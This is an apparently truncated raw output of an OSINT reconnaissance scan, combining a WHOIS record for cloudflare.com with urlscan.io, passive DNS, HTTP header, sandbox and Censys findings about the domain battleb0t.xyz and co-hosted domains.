DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2021-09-27T15:18:45Z
Creation Date: 2009-02-17T22:07:54Z
Registrar Registration Expiration Date: 2024-02-17T22:07:54Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | MySpace (Category: social)
https://myspace.com/Altpapier | Altpapier |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | [{u'sort': [1679937961810, u'be713cda-cf3f-49bd-91b6-e8517dc017bf'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'tags': [u'falconsandbox'], u'url': u'http://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-27T17:26:01.810Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 0, u'encodedDataLength': 0, u'requests': 1, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/be713cda-cf3f-49bd-91b6-e8517dc017bf.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/be713cda-cf3f-49bd-91b6-e8517dc017bf/', u'_id': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'page': {u'url': u'http://kekw.battleb0t.xyz/jar', u'domain': u'kekw.battleb0t.xyz', u'apexDomain': u'battleb0t.xyz'}}, {u'sort': [1679768811151, u'4b027c18-4e16-4bfc-8793-6295946cceb7'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'https://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-25T18:26:51.151Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 84, u'requests': 1, u'dataLength': 11}, u'screenshot': u'https://urlscan.io/screenshots/4b027c18-4e16-4bfc-8793-6295946cceb7.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/4b027c18-4e16-4bfc-8793-6295946cceb7/', u'_id': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'page': {u'mimeType': u'text/plain', u'status': u'502', u'domain': u'kekw.battleb0t.xyz', u'url': u'https://kekw.battleb0t.xyz/jar', u'country': u'DE', u'tlsValidFrom': u'2023-03-23T21:24:09.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'tlsIssuer': u'Easypanel', u'tlsValidDays': 3650, u'ip': u'64.226.81.43', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 1, u'asn': u'AS14061'}}, {u'sort': [1678573216685, u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:20:16.685Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea/', u'_id': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}, {u'sort': [1678573191537, u'd8289b22-dbac-48d2-856a-e99fe632406b'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:19:51.537Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/d8289b22-dbac-48d2-856a-e99fe632406b.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/d8289b22-dbac-48d2-856a-e99fe632406b/', u'_id': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}] |
| 2023-05-12 02:53:25 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3037::6815:470e | www.battleb0t.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.nousdine.com/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD626.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD605.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_8e0_ConnHashTable<2272>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_8e0_IESQMMUTEX_0_303"\n "IsoScope_8e0_IE_EarlyTabStart_0xe58_Mutex"\n "IsoScope_8e0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2272"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_8e0_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_8e0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2272"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.nousdine.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.nousdine.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.nousdine.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.nousdine.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabD604.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabD625.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "2AW67MIT.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2AW67MIT.txt]- [targetUID: 00000000-00002284]\n Dropped file: "P1DX0RMJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P1DX0RMJ.txt]- [targetUID: 00000000-00002272]\n Dropped file: "27MNWDMD.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\27MNWDMD.txt]- [targetUID: 00000000-00002272]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002284]\n "2AW67MIT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2AW67MIT.txt]- [targetUID: 00000000-00002284]\n "_7B0E49ED-7FFB-11ED-BBBA-080027597010_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "P1DX0RMJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P1DX0RMJ.txt]- [targetUID: 00000000-00002272]\n "~DF620C30C65B6B0A84.TMP" has type "data"- Location: [%TEMP%\\~DF620C30C65B6B0A84.TMP]- [targetUID: 00000000-00002272]\n "_4B81942E-8010-11ED-BBBA-080027597010_.dat" has type "data"- [targetUID: N/A]\n "CabD604.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabD604.tmp]- [targetUID: 00000000-00002284]\n "~DF188F70FFAD2D6FBE.TMP" has type "data"- Location: [%TEMP%\\~DF188F70FFAD2D6FBE.TMP]- [targetUID: 00000000-00002272]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC6D7D0DE241CCDB3.TMP" has type "data"- Location: [%TEMP%\\~DFC6D7D0DE241CCDB3.TMP]- [targetUID: 00000000-00002272]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002284]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002272]\n "TarD626.tmp" has type "data"- Location: [%TEMP%\\TarD626.tmp]- [targetUID: 00000000-00002284]\n "RecoveryStore._7B0E49EB-7FFB-11ED-BBBA-080027597010_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "27MNWDMD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\27MNWDMD.txt]- [targetUID: 00000000-00002272]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002284]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002284]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.nousdine.com/site.webmanifest"\n Pattern match: "https://www.nousdine.com"\n Pattern match: "www.nousdine.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.nousdine.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 125408\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 263\nContent-Type: application/octet-stream\nDate: Sun, 18 Dec 2022 14:04:39 GMT\nEtag: "18710f16312025d1c75893eeff15e235-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GMPGD8AKB1EXHD5EX130SDYH\n\n{"name":"","short_name":"","icons":[{"src":"/android-chrome-192x192.png","sizes":"192x192","type":"image/png"},{"src":"/android-chrome-512x512.png","sizes":"512x512","type":"image/png"}],"theme_color":"#ffffff","background_color":"#ffffff","display":"stand | 34.148.97.127 |
| 2023-05-12 02:54:34 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | {"last_updated_at": "2023-05-12T01:00:12.123Z", "ip": "104.21.71.14", "location_updated_at": "2023-04-28T19:19:18.236705Z", "autonomous_system_updated_at": "2023-05-09T16:20:05.625049Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"tiosmarigin.tk": {"record_type": "A", "resolved_at": "2023-03-11T19:39:44.575906671Z"}, "arididhe.ml": {"record_type": "A", "resolved_at": "2023-04-24T18:45:41.887412116Z"}, "vrukshali.com": {"record_type": "A", "resolved_at": "2023-04-08T16:35:57.455101722Z"}, "cosmicstory.info": {"record_type": "A", "resolved_at": "2022-09-26T02:33:11.327006722Z"}, "thesportsgrail.com": {"record_type": "A", "resolved_at": "2023-02-26T14:54:59.969967341Z"}, "webmail.plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-10-23T13:56:03.189903700Z"}, "www.septlightchristministries.org.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-05T18:22:49.197349430Z"}, "urposnasulebas.tk": {"record_type": "A", "resolved_at": "2023-05-03T21:59:06.417667953Z"}, "www.myobots.com": {"record_type": "A", "resolved_at": "2023-04-09T14:51:23.310423040Z"}, "www.adwokat-pancerz.pl.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-03T02:35:21.068173226Z"}, "portsaintjoescallopingcharters.com": {"record_type": "A", "resolved_at": "2023-04-21T15:46:43.176740366Z"}, "beautifytopsultimation.buzz": {"record_type": "A", "resolved_at": "2022-11-17T12:23:28.036579596Z"}, "admin.lamoonday.com": {"record_type": "A", "resolved_at": "2023-05-06T15:21:37.997359428Z"}, "demedetomi.cf": {"record_type": "A", "resolved_at": "2023-04-28T13:02:53.957272859Z"}, "kasabugraphics.com": {"record_type": "A", "resolved_at": "2023-05-01T14:43:01.025149560Z"}, "ope8.tv": {"record_type": "A", "resolved_at": "2023-05-03T22:04:13.875331255Z"}, "www.rise.co.th": {"record_type": "A", "resolved_at": "2023-05-07T21:57:04.071347817Z"}, "sgenundia.tk": {"record_type": "A", "resolved_at": "2023-03-24T07:24:26.513019486Z"}, "www.kjgenerationministries.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-10T18:40:04.194871729Z"}, "mistwarctolylong.tk": {"record_type": "A", "resolved_at": "2023-05-09T21:26:33.070368065Z"}, "mynevo.info": {"record_type": "A", "resolved_at": "2023-04-28T18:32:08.279256180Z"}, "adconcovawee.tk": {"record_type": "A", "resolved_at": "2023-04-11T22:21:41.715203906Z"}, "slanchogled.vipe.us": {"record_type": "A", "resolved_at": "2023-05-07T10:10:31.489137012Z"}, "yarmun.ru": {"record_type": "A", "resolved_at": "2022-11-24T10:10:59.048282776Z"}, "www.plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-10-24T22:38:44.245072355Z"}, "topcourse.org": {"record_type": "A", "resolved_at": "2023-05-03T21:16:34.517625638Z"}, "asexloyndicla.tk": {"record_type": "A", "resolved_at": "2023-05-11T21:41:02.129956664Z"}, "it-a-br-newcarok.live": {"record_type": "A", "resolved_at": "2023-04-29T18:23:19.166151443Z"}, "angie.vipe.us": {"record_type": "A", "resolved_at": "2023-05-07T22:13:24.900604639Z"}, "control.vipe.us": {"record_type": "A", "resolved_at": "2023-04-29T21:53:25.082390823Z"}, "jocworkvi.tk": {"record_type": "A", "resolved_at": "2023-04-19T23:39:03.920122991Z"}, "www.farasoacademy.com": {"record_type": "A", "resolved_at": "2023-04-24T14:37:26.546680400Z"}, "tiketpabe.ml": {"record_type": "A", "resolved_at": "2022-12-20T15:20:04.499578994Z"}, "cumslocals.com": {"record_type": "A", "resolved_at": "2023-04-02T14:31:43.668953015Z"}, "partebo.tk": {"record_type": "A", "resolved_at": "2023-05-03T04:54:07.371514288Z"}, "ydemle.tk": {"record_type": "A", "resolved_at": "2023-05-03T04:55:08.861274859Z"}, "gjtyew-bodf.valentiona890.workers.dev": {"record_type": "A", "resolved_at": "2023-04-20T20:28:09.792148401Z"}, "www.septlightchristministries.org": {"record_type": "CNAME", "resolved_at": "2022-11-14T16:33:28.688596487Z"}, "uktrenarteaapha.cf": {"record_type": "A", "resolved_at": "2023-01-08T12:27:30.216988388Z"}, "www.brevardnc.org": {"record_type": "A", "resolved_at": "2023-05-07T21:13:44.303349330Z"}, "reistomam.ml": {"record_type": "A", "resolved_at": "2023-04-04T19:32:24.563529019Z"}, "brunittamodaloja.com.br": {"record_type": "A", "resolved_at": "2022-11-16T12:16:31.177183594Z"}, "arezzobenessereshop.it": {"record_type": "A", "resolved_at": "2022-10-03T19:14:49.537388749Z"}, "plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-11-07T13:56:43.968941354Z"}, "630dc.com": {"record_type": "A", "resolved_at": "2023-05-08T13:21:12.392646346Z"}, "prechcamithotem.ga": {"record_type": "A", "resolved_at": "2023-04-28T18:15:48.598414983Z"}, "cvgy.top": {"record_type": "A", "resolved_at": "2023-05-03T04:55:52.694688313Z"}, "road.vipe.us": {"record_type": "A", "resolved_at": "2023-05-05T20:38:50.973706563Z"}, "www.clicarmoires.ca": {"record_type": "A", "resolved_at": "2023-04-17T17:46:34.291559938Z"}, "trakagcicsalutci.tk": {"record_type": "A", "resolved_at": "2023-05-01T20:45:54.004504568Z"}, "www.24hrupdate.online": {"record_type": "A", "resolved_at": "2023-03-22T20:33:59.416609462Z"}, "bioki.xyz": {"record_type": "A", "resolved_at": "2022-12-26T16:46:34.402722189Z"}, "walledgarden.global": {"record_type": "A", "resolved_at": "2023-05-03T00:39:45.829214813Z"}, "faclachop.tk": {"record_type": "A", "resolved_at": "2023-05-04T22:25:50.199894162Z"}, "terrtus.ch": {"record_type": "A", "resolved_at": "2023-05-11T12:57:19.817455256Z"}, "bestverfyspport.xyz": {"record_type": "A", "resolved_at": "2022-12-01T17:11:53.237569857Z"}, "tilimotica.ml": {"record_type": "A", "resolved_at": "2023-05-07T18:36:13.077272212Z"}, "xenarix.com": {"record_type": "A", "resolved_at": "2022-11-12T14:04:18.024188077Z"}, "ningchartjump.ml": {"record_type": "A", "resolved_at": "2023-01-07T15:35:22.698042631Z"}, "luigisitalianrestaurantuvalde.com": {"record_type": "A", 